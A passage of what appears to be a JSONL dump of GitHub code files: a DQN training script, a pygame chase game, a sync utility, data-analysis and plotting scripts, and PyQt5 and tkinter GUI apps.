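    for current in range(1, len(arr)):
        j = current
        while j > 0 and arr[j] < arr[j - 1]:
            arr[j], arr[j - 1] = arr[j - 1], arr[j]
            j -= 1
    return arr

assert insertion_sort_py([5, 1, 6, 2, 7, 3]) == [1, 2, 3, 5, 6, 7]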
steps in the underlying env\n return get_wrapper_by_name(env_arg, \"Monitor\").get_total_steps() >= num_timesteps\n\n optimizer_spec = OptimizerSpec(\n constructor=optim.RMSprop,\n kwargs=dict(lr=args.learning, alpha=ALPHA, eps=EPS),\n )\n\n exploration_schedule = LinearSchedule(1000000, 0.1)\n\n dqn_learing(\n env=env,\n q_func=DQN,\n optimizer_spec=optimizer_spec,\n exploration=exploration_schedule,\n stopping_criterion=stopping_criterion,\n replay_buffer_size=args.replay_buffer_size,\n batch_size=BATCH_SIZE,\n gamma=args.gamma,\n learning_starts=LEARNING_STARTS,\n learning_freq=LEARNING_FREQ,\n frame_history_len=FRAME_HISTORY_LEN,\n target_update_freq=TARGER_UPDATE_FREQ,\n gpu_idx=gpu_idx,\n loss=args.loss,\n stat_name=stats_name,\n actor_name=args.actor,\n beta=args.beta,\n init_std=args.init_std,\n bsched=args.bsched\n )\n\n\nif __name__ == '__main__':\n # Get Atari games.\n benchmark = gym.benchmark_spec('Atari40M')\n\n # Change the index to select a different game.\n # bm_task = benchmark.tasks[3] # pong\n bm_task = benchmark.tasks[1] # breakout\n\n # Run training\n main_seed = 0 # Use a seed of zero (you may want to randomize the seed!)\n\n main(bm_task, main_seed, bm_task.max_timesteps)\n","repo_name":"or-toledano/reinforcement-learning-dqn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3010358582","text":"import pygame\nfrom pygame.locals import *\nfrom pygame.sprite import Sprite, Group, groupcollide\nimport random\nfrom random import randint\n\nclass Character(Sprite):\n def __init__(self):\n super(Character, self).__init__()\n # self.rect = pygame.Rect(0,0,32,32)\n self.speed_x = 0\n self.speed_y = 0\n\nclass Hero(Character):\n def __init__(self, x, y):\n super() .__init__()\n self.x = x\n self.y = y\n self.image = pygame.image.load('images/hero.png')\n self.rect = self.image.get_rect()\n self.rect.centerx = self.x\n self.rect.top = self.y \n self.speed = 4\n self.should_move_down = False\n self.should_move_up = False\n self.should_move_left = False\n self.should_move_right = False\n\n def should_move(self, direction, start = True):\n if direction == \"right\":\n self.should_move_right = start\n if direction == \"left\":\n self.should_move_left = start\n if direction == \"up\":\n self.should_move_up = start\n if direction == \"down\":\n self.should_move_down = start \n\n def draw_me(self,w,h):\n if(self.should_move_right):\n if(self.x <= w - 64):\n self.x += self.speed\n elif(self.should_move_left):\n if(self.x >= 32):\n self.x -= self.speed\n elif(self.should_move_down):\n if(self.y <= h - 64):\n self.y += self.speed\n elif self.should_move_up:\n if(self.y >= 32):\n self.y -= self.speed \n self.rect.x = self.x \n self.rect.y = self.y\n \n def catch_monster(self, enemy):\n if self.x == enemy.x and self.y == enemy.y:\n print(\"collision detected\")\n enemy.kill()\n\nclass Monster(Character):\n def __init__(self, x, y):\n super() .__init__()\n self.x = x\n self.y = y\n self.image = pygame.image.load('images/monster.png')\n self.rect = self.image.get_rect()\n self.rect.centerx = self.x\n self.rect.top = self.y \n self.speed = 8\n \n def random_move(self,w,h):\n movements = [\"right\", \"up right\", \"down right\", \"left\", \"up left\", \"down left\", \"up\", \"down\"]\n random.shuffle(movements)\n i = movements[0]\n if i == \"right\":\n if self.x < w:\n self.x += self.speed\n else:\n self.x = 0\n self.x += self.speed\n elif i == 
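# Sketch (assumption, not the project's utils.schedule implementation): the
# call LinearSchedule(1000000, 0.1) above suggests epsilon annealed linearly
# from 1.0 down to 0.1 over 1e6 steps, roughly like this.
def linear_epsilon(t, total_steps=1_000_000, initial_p=1.0, final_p=0.1):
    frac = min(float(t) / total_steps, 1.0)
    return initial_p + frac * (final_p - initial_p)

assert linear_epsilon(0) == 1.0
assert abs(linear_epsilon(500_000) - 0.55) < 1e-12
assert abs(linear_epsilon(1_000_000) - 0.1) < 1e-12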
\"up right\":\n if self.x < w and self.y > 0:\n self.x += self.speed \n self.y -= self.speed\n else:\n self.x = 0\n self.x += self.speed \n self.y = h\n self.y -= self.speed\n elif i == \"down right\":\n if self.x < w and self.y < h:\n self.x += self.speed\n self.y += self.speed\n else: \n self.x = 0\n self.x += self.speed \n self.y = 0\n self.y += self.speed\n elif i == \"left\":\n if self.x > 0:\n self.x -= self.speed\n else: \n self.x = w\n self.x -= self.speed \n elif i == \"up left\":\n if self.x > 0 and self.y > 0:\n self.x -= self.speed\n self.y -= self.speed \n else: \n self.x = w\n self.x -= self.speed \n self.y = h\n self.y -= self.speed \n elif i == \"down left\":\n if self.x > 0 and self.y < h:\n self.x -= self.speed\n self.y += self.speed\n else: \n self.x = w\n self.x -= self.speed \n self.y = 0\n self.y += self.speed\n elif i == \"down\":\n if self.y <= h:\n self.y += self.speed\n else:\n self.y = 0\n self.y += self.speed\n elif i == \"up\":\n if self.y >= 0:\n self.y -= self.speed \n else:\n self.y = h\n self.y -= self.speed \n self.rect.x = self.x \n self.rect.y = self.y\n pygame.time.delay(50)\n \n def kill(self):\n pygame.sprite.Sprite.kill(self)\n\n# instantiate Hero object & create sprite group\nthe_hero = Hero(100, 100)\nheroes = pygame.sprite.Group()\nheroes.add(the_hero)\n\n# instantiate Monster object & create sprite group\nthe_monster = Monster(250, 250)\nmonsters = pygame.sprite.Group()\nmonsters.add(the_monster)\n\ndef main():\n width = 512\n height = 480\n\n pygame.init()\n screen = pygame.display.set_mode((width, height))\n pygame.display.set_caption('Monster Chase')\n\n background_image = pygame.image.load('images/background.png')\n\n # Game initialization\n stop_game = False\n while not stop_game:\n for event in pygame.event.get():\n\n # Event handling\n\n if event.type == pygame.QUIT:\n stop_game = True\n\n # event listener for keydown\n elif event.type == pygame.KEYDOWN:\n if event.key == 275:\n the_hero.should_move(\"right\")\n elif event.key == 276: \n the_hero.should_move(\"left\")\n elif event.key == 273: \n the_hero.should_move(\"up\")\n elif event.key == 274: \n the_hero.should_move(\"down\")\n\n elif event.type == pygame.KEYUP:\n if event.key == 275: \n the_hero.should_move(\"right\", False)\n elif event.key == 276: #left arrow\n the_hero.should_move(\"left\", False)\n if event.key == 273: #up arrow\n the_hero.should_move(\"up\", False)\n elif event.key == 274: #down arrow\n the_hero.should_move(\"down\", False) \n\n # Draw game\n if stop_game == False:\n screen.blit(background_image, [0,0])\n\n for the_monster in monsters:\n screen.blit(the_monster.image, [the_monster.x, the_monster.y])\n the_monster.random_move(512, 480)\n\n for the_hero in heroes: \n the_hero.draw_me(512,480) \n the_hero.catch_monster(the_monster)\n screen.blit(the_hero.image, [the_hero.x, the_hero.y])\n\n # Game display\n pygame.display.flip()\n\n pygame.quit()\n\nif __name__ == '__main__':\n main()\n","repo_name":"katiejduane/DIR-ing","sub_path":"unit1_python/pygame-master/jb_monster-chase.py","file_name":"jb_monster-chase.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73966437584","text":"#!/usr/bin/env python\n\nimport os\nfrom optparse import OptionParser\n\nparser = OptionParser()\nparser.add_option(\"--version\", action=\"store_true\", dest=\"version\", help=\"output version information and exit\")\n\n(options, args) = parser.parse_args()\n\nif options.version:\n 
print('sync (pycoreutils) 0.1')\nelse:\n    os.sync()\n","repo_name":"jelly/pycoreutils","sub_path":"src/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"72250735185","text":"# imports\nimport pandas as pd; import missingno as msno; import matplotlib.pyplot as plt; import seaborn as sns;import numpy as np;import warnings\nfrom sklearn import preprocessing; from scipy import stats\nfrom sklearn.preprocessing import PowerTransformer\nfrom scipy.stats import normaltest\nfrom scipy.stats import ttest_ind, ks_2samp\nfrom scipy.stats import describe\n\n# settings\nnp.seterr(divide='warn', invalid='warn'); sns.set_style(\"whitegrid\");warnings.filterwarnings('ignore')\n\n# Import Files\nmf_num_data = pd.read_csv('bosch_small_data/train_numeric.csv',low_memory=False)\nprint('train_numeric.csv loaded...')\nmf_date_data = pd.read_csv('bosch_small_data/train_date.csv',low_memory=False)\nprint('train_date.csv loaded...')\nmf_cat_data = pd.read_csv('bosch_small_data/train_cat.csv',low_memory=False)\nprint('train_cat.csv loaded...')\n\n# Function for determining params of sample distribution\ndef distribution_assignment(sample):\n    k2, p = normaltest(sample, nan_policy='omit')\n    alpha = 0.00001 # null hypothesis: Sample comes from a normal distribution\n    dist = 'Not Normally Distributed' if p < alpha else 'Normally Distributed'\n    return dist\n\ndef sample_test(df,c, test, p_threshold):\n    c = df.columns[c]\n    a,b = df[c][df['Response']==0].dropna(), df[c][df['Response']==1].dropna()\n    d,p = test(a,b)\n    s = 'Different' if p < p_threshold else 'Same'\n    return c,s,p,d\n\n# Function for different viz of distributions\ndef plot_dist(df, col_index, transformed):\n    c = df.columns[col_index]\n    normed = distribution_assignment(df[c])\n    print(describe(df[c]))\n    s_3 = df[c][np.abs(df[c]-df[c].mean()) <= (3*df[c].std())] # Keep inner 99.7 % of the Data\n    s_1 = df[c][np.abs(df[c]-df[c].mean()) <= (1*df[c].std())] # Keep inner 68% of the Data\n    transformed = transformed[~np.isnan(transformed)] # Show the complete transformation of mf_num_data\n    \n    plt.figure(figsize=(20,1))\n    plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=1)\n    \n    plt.subplot(1, 2, 1)\n    plt.title('Feature: {}\\nDistribution: {}\\n\\nOriginal\\nSample Count: {}'.format(c,normed,len(df[c].dropna())))\n    sns.distplot(df[c].dropna(),color='blue')\n    plt.xlabel('')\n\n    s_success = df[c][df['Response']==0].dropna()\n    s_failure = df[c][df['Response']==1].dropna()\n    sampling_results = sample_test(df,col_index, ks_2samp,.1)\n    \n    plt.subplot(1, 2, 2)\n    sns.distplot(s_success)\n    plt.xlabel('')\n    \n    plt.subplot(1, 2, 2)\n    plt.title('Success/Failure\\n\\n{}\\nSuccess Count: {}\\nFailure Count: {}'.format(sampling_results,len(s_success),len(s_failure)))\n    sns.distplot(s_failure,color='purple')\n    plt.xlabel('')\n    plt.legend(['Success','Failure'])\n    \npt = PowerTransformer()","repo_name":"kimrharper/data_science_nltk","sub_path":"manufacturing/utils/mf_stats_analysis.py","file_name":"mf_stats_analysis.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"14612242640","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Guide: open conda tensorflow_cpu : cd to the folder save file.ui: comment: pyuic5 -x test.ui -o test.py\n# convert ipynb to py ### comment: ipython nbconvert --to script 
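# Sketch (illustrative, not part of the original record): the hypothesis-test
# convention behind distribution_assignment above — scipy.stats.normaltest
# takes normality as the null hypothesis, so a small p-value is evidence
# AGAINST normality, not for it.
import numpy as np
from scipy.stats import normaltest

rng = np.random.default_rng(0)
k2, p = normaltest(rng.normal(size=1000))
label = "Not Normally Distributed" if p < 1e-5 else "Normally Distributed"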
\"PyQt5_v10.ipynb\"\n# convert py to exe:\n# # comment in conda with direction from file.py: pip install pyinstaller\n # pyinstaller PyQt5_v10.py\n\n\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QTextEdit, QDialog\nfrom PyQt5 import uic\nimport sys\nimport cv2\n\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtGui import QImage\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nfrom collections import deque\nfrom imutils.video import VideoStream\nimport numpy as np\nimport argparse\nimport imutils\nimport time\n\nfrom detector import detect_frame \n\nbuffer = 32\n\ngreenLower = (29, 86, 6)\ngreenUpper = (64, 255, 255)\n#greenUpper = (225, 100, 70)\n\npts = deque(maxlen=buffer)\ncounter = 0\n(dX, dY) = (0, 0)\ndirection = \"\"\n\ntime.sleep(2.0)\n\nclass Ui_Dialog(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(900, 600)\n self.imgLabel_1 = QtWidgets.QLabel(Dialog)\n self.imgLabel_1.setGeometry(QtCore.QRect(150, 80, 471, 441))\n self.imgLabel_1.setAutoFillBackground(False)\n self.imgLabel_1.setFrameShape(QtWidgets.QFrame.Box)\n self.imgLabel_1.setFrameShadow(QtWidgets.QFrame.Raised)\n self.imgLabel_1.setLineWidth(2)\n self.imgLabel_1.setScaledContents(True)\n self.imgLabel_1.setObjectName(\"imgLabel_1\")\n self.SHOW = QtWidgets.QPushButton(Dialog)\n self.SHOW.setGeometry(QtCore.QRect(10, 80, 71, 31))\n self.SHOW.setObjectName(\"SHOW\")\n self.CAPTURE = QtWidgets.QPushButton(Dialog)\n self.CAPTURE.setGeometry(QtCore.QRect(10, 120, 131, 51))\n self.CAPTURE.setObjectName(\"CAPTURE\")\n self.TEXT = QtWidgets.QTextBrowser(Dialog)\n self.TEXT.setGeometry(QtCore.QRect(10, 10, 256, 61))\n self.TEXT.setObjectName(\"TEXT\")\n self.imgLabel_2 = QtWidgets.QLabel(Dialog)\n self.imgLabel_2.setGeometry(QtCore.QRect(630, 80, 220, 220))\n self.imgLabel_2.setFrameShape(QtWidgets.QFrame.Box)\n self.imgLabel_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.imgLabel_2.setLineWidth(2)\n self.imgLabel_2.setScaledContents(True)\n self.imgLabel_2.setObjectName(\"imgLabel_2\")\n self.imgLabel_3 = QtWidgets.QLabel(Dialog)\n self.imgLabel_3.setGeometry(QtCore.QRect(630, 305, 220, 215))\n self.imgLabel_3.setFrameShape(QtWidgets.QFrame.Box)\n self.imgLabel_3.setFrameShadow(QtWidgets.QFrame.Raised)\n self.imgLabel_3.setLineWidth(2)\n self.imgLabel_3.setScaledContents(True)\n self.imgLabel_3.setObjectName(\"imgLabel_3\")\n # self.imgLabel_4 = QtWidgets.QLabel(Dialog)\n # self.imgLabel_4.setGeometry(QtCore.QRect(630, 400, 151, 121))\n # self.imgLabel_4.setFrameShape(QtWidgets.QFrame.Box)\n # self.imgLabel_4.setFrameShadow(QtWidgets.QFrame.Raised)\n # self.imgLabel_4.setLineWidth(2)\n # self.imgLabel_4.setScaledContents(True)\n # self.imgLabel_4.setObjectName(\"imgLabel_4\")\n self.TEXT_2 = QtWidgets.QTextBrowser(Dialog)\n self.TEXT_2.setGeometry(QtCore.QRect(10, 310, 131, 31))\n font = QtGui.QFont()\n font.setPointSize(9)\n # self.TEXT_2.setFont(font)\n # self.TEXT_2.setObjectName(\"TEXT_2\")\n # self.TEXT_3 = QtWidgets.QTextBrowser(Dialog)\n # self.TEXT_3.setGeometry(QtCore.QRect(10, 270, 101, 31))\n # self.TEXT_3.setObjectName(\"TEXT_3\")\n # self.TEXT_4 = QtWidgets.QTextBrowser(Dialog)\n # self.TEXT_4.setGeometry(QtCore.QRect(10, 310, 101, 31))\n # self.TEXT_4.setObjectName(\"TEXT_4\")\n # self.TEXT_5 = QtWidgets.QTextBrowser(Dialog)\n # self.TEXT_5.setGeometry(QtCore.QRect(10, 350, 101, 31))\n # self.TEXT_5.setObjectName(\"TEXT_5\")\n self.TEXT_6 = 
QtWidgets.QTextBrowser(Dialog)\n self.TEXT_6.setGeometry(QtCore.QRect(90, 80, 51, 31))\n self.TEXT_6.setObjectName(\"TEXT_6\")\n self.label = QtWidgets.QLabel(Dialog)\n self.label.setGeometry(QtCore.QRect(20, 289, 111, 21))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.imgLabel_1.setText(_translate(\"Dialog\", \"TextLabel\"))\n self.SHOW.setText(_translate(\"Dialog\", \"Show\"))\n self.CAPTURE.setText(_translate(\"Dialog\", \"Capture Screen Shot\"))\n self.imgLabel_2.setText(_translate(\"Dialog\", \"TextLabel\"))\n self.imgLabel_3.setText(_translate(\"Dialog\", \"TextLabel\"))\n #self.imgLabel_4.setText(_translate(\"Dialog\", \"TextLabel\"))\n self.label.setText(_translate(\"Dialog\", \"IOU SCORE\"))\n\n\nclass MainWindow(QWidget):\n # class constructor\n def __init__(self):\n # call QWidget constructor\n super().__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n\n # create a timer\n self.timer = QTimer()\n # set timer timeout callback function\n self.timer.timeout.connect(self.viewCam)\n \n self.ui.SHOW.clicked.connect(self.controlTimer)\n \n self.logic = 0\n self.value = 1\n self.ui.CAPTURE.clicked.connect(self.CaptureClicked)\n \n def CaptureClicked(self):\n self.logic =2\n \n def viewCam(self):\n self.ui.TEXT.setText('Kindly Press \"Capture Image\" to capture image')\n \n # self.cap = cv2.VideoCapture(0)\n # start timer\n #self.timer.start(20)\n # read image in BGR format\n ret, image = self.cap.read()\n \n # convert image to RGB format\n image = imutils.resize(image, width=600)\n \n \n # convert image to RGB format \n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n right_area, left_area, iou_score, img_both_eye, img_corrected = detect_frame(image)\n\n iou_score = \"{:.4f}\".format(iou_score)\n self.ui.TEXT_2.setText(iou_score)\n\n # get image infos\n height, width, channel = img_corrected.shape\n step = channel * width\n # create QImage from image\n qImg = QImage(img_corrected.data, width, height, step, QImage.Format_RGB888)\n # show image in img_label\n self.ui.imgLabel_1.setPixmap(QPixmap.fromImage(qImg))\n\n\n \n \n # get image blurred\n blurred = img_both_eye\n hsv = img_corrected \n\n height_2, width_2, channel_2 = blurred.shape\n step_2 = channel_2 * width_2\n qImg_2 = QImage(blurred.data, width_2, height_2, step_2, QImage.Format_RGB888)\n self.ui.imgLabel_2.setPixmap(QPixmap.fromImage(qImg_2))\n \n # get image hsv\n height_3, width_3, channel_3 = image.shape\n step_3 = channel_3 * width_3\n qImg_3 = QImage(image.data, width_3, height_3, step_3, QImage.Format_RGB888)\n self.ui.imgLabel_3.setPixmap(QPixmap.fromImage(qImg_3))\n \n # # get image mask\n # height_4, width_4= mask.shape\n # step_4 = 3 * width_4 # dont need step -> int bytesPerLine\n # qImg_4 = QImage(mask.data, width_4, height_4, QImage.Format_Grayscale8) # link ref https://qt.developpez.com/doc/4.7/qimage/ ; https://doc.qt.io/qt-5/qimage.html\n # self.ui.imgLabel_4.setPixmap(QPixmap.fromImage(qImg_4))\n \n if(self.logic==2): \n self.value = self.value + 1\n self.ui.TEXT_3.setText(\"Capture\")\n image = cv2.cvtColor(img_corrected, cv2.COLOR_BGR2RGB)\n cv2.imwrite('myout.png',img_corrected)\n self.logic=1 \n \n def controlTimer(self):\n # if timer is stopped\n if not self.timer.isActive():\n # create video 
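# Sketch (illustrative, not part of the original record): the frame-to-QImage
# conversion used in viewCam above. QImage(data, width, height, bytesPerLine,
# format) is the real PyQt5 signature; bytesPerLine is channels * width for a
# packed RGB888 frame. Assumes PyQt5 and numpy are installed.
import numpy as np
from PyQt5.QtGui import QImage

frame = np.zeros((480, 600, 3), dtype=np.uint8)  # an RGB frame, as after cv2.cvtColor
h, w, ch = frame.shape
qimg = QImage(frame.data, w, h, ch * w, QImage.Format_RGB888)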
capture\n self.cap = cv2.VideoCapture(0)\n # start timer\n self.timer.start(20)\n # update control_bt text\n self.ui.TEXT_6.setText(\"Running\")\n # if timer is started\n else:\n # stop timer\n self.timer.stop()\n # release video capture\n self.cap.release()\n # update control_bt text\n self.ui.TEXT_6.setText(\"Stop\")\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n # create and show mainWindow\n mainWindow = MainWindow()\n mainWindow.show()\n\n sys.exit(app.exec_())\n \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"upneet-bit/Eyebrow-Accuracy-Detector","sub_path":"process1/PFLD-pytorch/PyQt5_v10.py","file_name":"PyQt5_v10.py","file_ext":"py","file_size_in_byte":8865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13920549416","text":"'''\nProduce composite difference versus height plots comparing AERIoe retrievals\nDates analyzed: 20170516 -- 20170612\n\nAuthor: Brian Greene\nUniversity of Oklahoma\nLast update: April 2020\n'''\n# Python Packages\nimport os\nfrom datetime import datetime, timedelta\nimport warnings\nimport pickle\nimport gzip\n\n# Installed packages\nimport netCDF4\nimport numpy as np\nimport cmocean\n\nfrom glob import glob\nfrom datetime import datetime\nfrom scipy.interpolate import interp1d\nfrom matplotlib import rc\nfrom matplotlib import dates as mpdates\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator)\n\n# ---------------- #\n# Data directories #\n# ---------------- #\n# home directory\nhome = os.path.expanduser(\"~\")\n# main data directory\nBUL = os.path.join(home, \"Documents\", \"Data\", \"BUL\")\n# piclke file data (same directory as this file)\npkl = os.path.join(os.getcwd(), \"pkl\")\n# figure save directory\nfigpath = os.path.join(BUL, \"Figures\", \"composite\")\nif not os.path.exists(figpath):\n os.mkdir(figpath)\n# close all figures\nplt.close(\"all\")\n\n# -------------------------------------------------------------- #\n# Load 3 pickle files as dictionaries sorted by date of the data #\n# -------------------------------------------------------------- #\n# define reading function\ndef read_pickle_gz(filepath):\n print(f\"Reading file: {filepath.split(os.sep)[-1]}\")\n with gzip.open(filepath, \"rb\") as f:\n data = pickle.load(f)\n return data\n\ndef read_pickle(filepath):\n print(f\"Reading file: {filepath.split(os.sep)[-1]}\")\n with open(filepath, \"rb\") as f:\n data = pickle.load(f)\n return data\n\n# load data\nf_AERI = os.path.join(pkl, \"aeri.pickle\")\ndata_a = read_pickle(f_AERI)\nf_AERIrLID = os.path.join(pkl, \"aeri_rlid.pickle\")\ndata_ar = read_pickle(f_AERIrLID)\nf_AERIvDIAL = os.path.join(pkl, \"aeri_vdial.pickle\")\ndata_av = read_pickle(f_AERIvDIAL)\n\n# -------------------- #\n# Calculate statistics #\n# -------------------- #\n# temperature\n# raman\nT_diff_ar = data_a[\"temperature\"] - data_ar[\"temperature\"]\nT_med_ar = np.nanmedian(T_diff_ar, axis=0)\nT_q1_ar = np.nanpercentile(T_diff_ar, 25., axis=0)\nT_q3_ar = np.nanpercentile(T_diff_ar, 75., axis=0)\n# wv dial\nT_diff_av = data_a[\"temperature\"] - data_av[\"temperature\"]\nT_med_av = np.nanmedian(T_diff_av, axis=0)\nT_q1_av = np.nanpercentile(T_diff_av, 25., axis=0)\nT_q3_av = np.nanpercentile(T_diff_av, 75., axis=0)\n\n# wvmr\n# raman\nw_diff_ar = data_a[\"wvmr\"] - data_ar[\"wvmr\"]\nw_med_ar = np.nanmedian(w_diff_ar, axis=0)\nw_q1_ar = np.nanpercentile(w_diff_ar, 25., axis=0)\nw_q3_ar = np.nanpercentile(w_diff_ar, 75., 
axis=0)\n# wv dial\nw_diff_av = data_a[\"wvmr\"] - data_av[\"wvmr\"]\nw_med_av = np.nanmedian(w_diff_av, axis=0)\nw_q1_av = np.nanpercentile(w_diff_av, 25., axis=0)\nw_q3_av = np.nanpercentile(w_diff_av, 75., axis=0)\n\n# ---- #\n# Plot #\n# ---- #\nrc('font',weight='normal',size=20,family='serif',serif='Computer Modern Roman')\nrc('text',usetex='True')\nz = data_a[\"height\"]\n\nfig1, ax1 = plt.subplots(nrows=1, ncols=2, sharey=True, figsize=(12, 8))\n# temperature differences\n# raman\nax1[0].plot(T_med_ar, z, \"-b\", linewidth=3.)\nax1[0].fill_betweenx(z, T_q1_ar, T_q3_ar, alpha=0.3, color=\"b\")\n# wv dial\nax1[0].plot(T_med_av, z, \"-r\", linewidth=3.)\nax1[0].fill_betweenx(z, T_q1_av, T_q3_av, alpha=0.3, color=\"r\")\n# subplot setup\nax1[0].axvline(0., linewidth=2., color=\"k\", linestyle=\"--\")\nax1[0].grid()\nax1[0].set_xlabel(r\"$T_{AERI} - (T_{AERIrLID}, T_{AERIvDIAL})$ [$^\\circ$C]\", fontsize=20)\nax1[0].set_ylabel(\"Height [m AGL]\", fontsize=20)\nax1[0].set_xlim([-0.4, 0.6])\nax1[0].set_ylim([0., 3.7])\n\n# wvmr differences\nax1[1].plot(w_med_ar, z, \"-b\", linewidth=3)\nax1[1].fill_betweenx(z, w_q1_ar, w_q3_ar, alpha=0.3, color=\"b\")\n# wv dial\nax1[1].plot(w_med_av, z, \"-r\", linewidth=3)\nax1[1].fill_betweenx(z, w_q1_av, w_q3_av, alpha=0.3, color=\"r\")\n# subplot setup\nax1[1].axvline(0., linewidth=2., color=\"k\", linestyle=\"--\")\nax1[1].grid()\nax1[1].set_xlabel(r\"$w_{AERI} - (w_{AERIrLID}, w_{AERIvDIAL})$ [g kg$^{-1}$]\", fontsize=20)\nax1[1].set_xlim([-1.5, 1.5])\n\n#\n# Plot all diffs as xs\n#\n# vdial\nfig2, ax2 = plt.subplots(nrows=1, ncols=2, sharey=True, figsize=(12, 8))\n# temperature differences\nfor i in range(len(z)):\n ax2[0].plot(T_diff_av[:, i], z[i]*np.ones(len(T_diff_av[:, i])), \"kx\", alpha=0.3)\nax2[0].plot(T_med_ar, z, \"ro\")\nax2[0].plot(np.nanmean(T_diff_av, axis=0), z, \"bx\")\nax2[0].grid()\nax2[0].set_ylim([0., 1.])\nax2[0].set_xlim([-6., 6.])\nax2[0].set_ylabel(\"Height [km AGL]\")\nax2[0].set_xlabel(\"AERIonly T - AERIvDIAL T [$^\\circ$C]\")\n\n# wvmr diff\nfor i in range(len(z)):\n ax2[1].plot(w_diff_av[:, i], z[i]*np.ones(len(w_diff_av[:, i])), \"kx\", alpha=0.3)\nax2[1].plot(w_med_ar, z, \"ro\")\nax2[1].plot(np.nanmean(w_diff_av, axis=0), z, \"bx\")\nax2[1].grid()\nax2[1].set_xlim([-6., 6.])\nax2[1].set_xlabel(\"AERIonly w - AERIvDIAL w [g kg$^{-1}]\")\n\nplt.show()","repo_name":"bgreene777/BUL","sub_path":"plot_diff.py","file_name":"plot_diff.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73908838547","text":"import matplotlib.pyplot as plt\r\nimport random\r\nfrom tkinter import * \r\nfrom tkinter import Entry\r\nfrom tkinter import messagebox\r\n\r\nclass GUI():\r\n def partition(self, arr, low, high): \r\n i = (low-1) # index of smaller element \r\n pivot = arr[high] # pivot \r\n \r\n for j in range(low , high): \r\n \r\n # If current element is smaller than the pivot \r\n if arr[j] < pivot: \r\n \r\n # increment index of smaller element \r\n i = i+1 \r\n arr[i],arr[j] = arr[j],arr[i] \r\n \r\n arr[i+1],arr[high] = arr[high],arr[i+1] \r\n\r\n return (i+1)\r\n\r\n def quickSort(self, arr,low,high): \r\n if low < high: \r\n \r\n # pi is partitioning index, arr[p] is now \r\n # at right place \r\n pi = self.partition(arr,low,high) \r\n \r\n # Separately sort elements before \r\n # partition and after partition \r\n self.quickSort(arr, low, pi-1) \r\n self.quickSort(arr, pi+1, high) \r\n \r\n # Driver code to test above\r\n 
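# Sketch (illustrative, not part of the original records): the
# median-plus-interquartile envelope pattern from the plot_diff.py record
# above — nan-aware reductions along the day axis, shaded with fill_betweenx.
# The data here is a random stand-in.
import numpy as np
from matplotlib import pyplot as plt

diff = np.random.default_rng(1).normal(size=(28, 50))   # days x heights
z = np.linspace(0.0, 3.7, 50)
med = np.nanmedian(diff, axis=0)
q1, q3 = np.nanpercentile(diff, [25.0, 75.0], axis=0)
fig, ax = plt.subplots()
ax.plot(med, z, "-b", linewidth=3.)
ax.fill_betweenx(z, q1, q3, alpha=0.3, color="b")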
def listToString(self, s):\r\n str1 = ''\r\n for ele in s:\r\n str1 += ele\r\n\r\n return str1\r\n\r\n def go(self):\r\n self.r = int(self.ran.get())\r\n self.q1 = int(self.q.get())\r\n\r\n for _ in range(self.q1):\r\n self.value = random.randint(0, self.r)\r\n self.L.append(self.value)\r\n self.generated = self.listToString(str(self.L))\r\n \r\n self.info = messagebox.showinfo('Generated numbers', self.generated)\r\n plt.plot(self.L, 'r--d')\r\n self.n = len(self.L)\r\n self.quickSort(self.L,0,self.n-1)\r\n\r\n for i in self.L:\r\n self.val_bin = format(i, 'b')\r\n self.L1.append(self.val_bin)\r\n self.generated1 = self.listToString(str(self.L1))\r\n\r\n self.info1 = messagebox.showinfo('Sorted generated numbers', self.listToString(str(self.L)))\r\n self.info2 = messagebox.showinfo('Sorted generated numbers in binary format', self.generated1)\r\n plt.plot(self.L, 'b--o')\r\n plt.show()\r\n\r\n def __init__(self):\r\n self.root = Tk()\r\n self.root.title('Data Sort')\r\n self.root.iconbitmap('pythonIcon.ico')\r\n self.frame = Frame()\r\n self.frame.pack()\r\n self.frame.config(bd=20)\r\n self.random = random.seed(0)\r\n self.lblRange = Label(self.frame, text = 'Please, insert the limit range of random numbers!')\r\n self.lblRange.grid(row=0, column=0, sticky='N')\r\n self.ran = Entry(self.frame)\r\n self.ran.grid(row=1, column=0, sticky='N')\r\n self.lblQuantity = Label(self.frame, text = 'Please, insert how many random numbers you want!')\r\n self.lblQuantity.grid(row=2, column=0, sticky='N')\r\n self.q = Entry(self.frame)\r\n self.q.grid(row=3, column=0, sticky='N')\r\n self.L = []\r\n self.L1 = []\r\n self.b1 = Button(self.frame, text = 'Go!', command = lambda: 